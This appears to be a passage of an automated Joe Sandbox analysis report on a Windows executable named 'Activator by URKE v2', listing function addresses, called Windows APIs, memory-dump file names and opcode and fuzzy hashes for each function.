                                                                                                                                                                                                                                                  • Instruction ID: a2d366d2ed9299c49e15aa583b29750c84ae86cb45fc42f7febc684a687a66e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE0869AE0964F42FF14BBF294743F496989F54F41B844432D90DC6251DE3C64854622
                                                                                                                                                                                                                                                  Function 00007FF7E5EF6858 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1017591355-0
                                                                                                                                                                                                                                                  • Opcode ID: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                                                                                                                                                                                                                                  • Instruction ID: 8b76599847e55efd607448f7412f6f56c7e6bd3805b380c9ab9c3995b99ca980
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7618211E08A4F43EA64BA15973537AD2919F44FD4FE48137DACE8E6C6EE3CE4518232
                                                                                                                                                                                                                                                  Function 00007FF7E5F04A98 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: d4b9ce99b7fb85a6f5ade4ac6f5d56101c3100c6306f9e3b8916f0306848e0ee
                                                                                                                                                                                                                                                  • Instruction ID: c9213dc7e4817e9827e6837909133f9cc0e1b47dab9ad7014a2576bc708870dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4b9ce99b7fb85a6f5ade4ac6f5d56101c3100c6306f9e3b8916f0306848e0ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0071CF62F1865A45FE00FB6595643FDA262BF44F98FC44133D91EC36C9DE3CA8818322
                                                                                                                                                                                                                                                  Function 00007FF7E5F076F8 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F079DB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                                                                                                  • Opcode ID: 48675f2cd70899b16daa9e02c98fa2a3f2d2572e45105ae0c44161088a50af4e
                                                                                                                                                                                                                                                  • Instruction ID: dc685ee9caf38e0941eb2343510f532628dd7252769ed1bbbe7b69ec0085185b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48675f2cd70899b16daa9e02c98fa2a3f2d2572e45105ae0c44161088a50af4e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9817B61E0964B85FA60BB11A9603F9A792AF44F58FD80177D94CC3291DF7CE850C362
                                                                                                                                                                                                                                                  Function 00007FF7E5F09A70 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                                                                                                                                                                                                                                  • Instruction ID: 0a63be1639de501a734d068086eca487373267ed361b0edfabf22dce7e67138d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76619821E1C68B41EA60FB14D6A43F9E390EF94B58FC44137D98DC76A6DE7CE5808722
                                                                                                                                                                                                                                                  Function 00007FF7E5EF552C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: 80d31ffb998990432937a4bebfe14c3f785fcf1a15978bfffc0263996b000582
                                                                                                                                                                                                                                                  • Instruction ID: 694adea1dd10c33579d81bbf58a9727f6c370386f21683342916069b4565ef04
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80d31ffb998990432937a4bebfe14c3f785fcf1a15978bfffc0263996b000582
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE41F322A08B4940EE10AF24E265379A361FB54FD8FC41137EADD8B7A9DE3CE451C671
                                                                                                                                                                                                                                                  Function 00007FF7E5F1F2D8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                                  • Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                                                                                                  • Instruction ID: 8fae4fe526d807ca000c73325f61c2d218d320d9bd64be5c1d4ca6e72d39ba73
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C419D61E1860A82FA28FB15E5B03F8A291AF54F40FC4543BD90EC7696DF3DE8448772
                                                                                                                                                                                                                                                  Function 00007FF7E5F04EE4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F05023
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                                                                                                  • Opcode ID: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                                                                                                                                                                                                                                  • Instruction ID: 712b09b72e204b66a0b8e494137d4a89487b61e0c381aa4a4fa0a2b99b633a1a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B318021B1974A81EE10BB15E5643AAE390BF84F85FC40136DA9D87B96CF3CE8508722
                                                                                                                                                                                                                                                  Function 00007FF7E5F246DC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                  • Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                                                                                                  • Instruction ID: 81d00c9a6ff81a7c2660954f9252bca50644628c844569bcdf45e626bac9212b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E411B77990C68AC2FB10AF1094643F9E294FB41B80FC40436DA9DC7795DF7CE9008762
                                                                                                                                                                                                                                                  Function 00007FF7E5EFD300 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BuffChar
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1973267554-0
                                                                                                                                                                                                                                                  • Opcode ID: 8b8939e40957b35135b4071df69a157c3da3e34ac92911fd1392d191323ad078
                                                                                                                                                                                                                                                  • Instruction ID: fb2f1e76855552694bb9ee7f5c5c9a4c560672586c2b986e401e20cf21a3526f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b8939e40957b35135b4071df69a157c3da3e34ac92911fd1392d191323ad078
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C11CA52609A4941EB08AF26A72423CA751EB05FD4FC44536CB6D8F3D9CE3CD5708372
                                                                                                                                                                                                                                                  Function 00007FF7E5EF6288 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: FindFirstFileW.KERNEL32 ref: 00007FF7E5EF64CB
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: FindFirstFileW.KERNEL32 ref: 00007FF7E5EF651E
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: GetLastError.KERNEL32 ref: 00007FF7E5EF656F
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464966427-0
                                                                                                                                                                                                                                                  • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                                                                                                  • Instruction ID: 7c755a06f68bc34877c77a0893292c606b6468130ff7cfd4a194c8bb3ec602d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0D16290828546EB10BB74A214278A3609B29FB4FD41376DABD4F2C7CE38D464CB36
                                                                                                                                                                                                                                                  Function 00007FF7E5F000F0 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemMessageSend
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3015471070-0
                                                                                                                                                                                                                                                  • Opcode ID: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                                                                                                  • Instruction ID: 57d19b0de773c04b6d1287ed88f61fe7dac980c6bf2caf60ee0ad5c88e53a541
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1D05B50F1864942EA10B711943977593116F51F85F900133DA8D9A791CD3CD6214B56
                                                                                                                                                                                                                                                  Function 00007FF7E5EF8CF8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                                                                                                                                  • Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                                                                                                                                                                                                                  • Instruction ID: 8782a880628954eeaeb5fb0a49c792f9288e1ebbbda94b91c596aa08cf94f2ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C08C20F05606C2DA08AB26D8A921812A8FB90F04FE08036C50CC2160DE3DC4AA8362
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4E00 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                                                                                                                                  • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                                                                                                  • Instruction ID: dd808b7453ef96e1969a7a6e4dd9e83d905c1caa64e2ec59acfccd155f8de0f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EB09214B02585C2D604AB22DC922185328AB88F01BD84421C90DD2220CE2CD8EB9701
                                                                                                                                                                                                                                                  Function 00007FF7E5F22E94 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
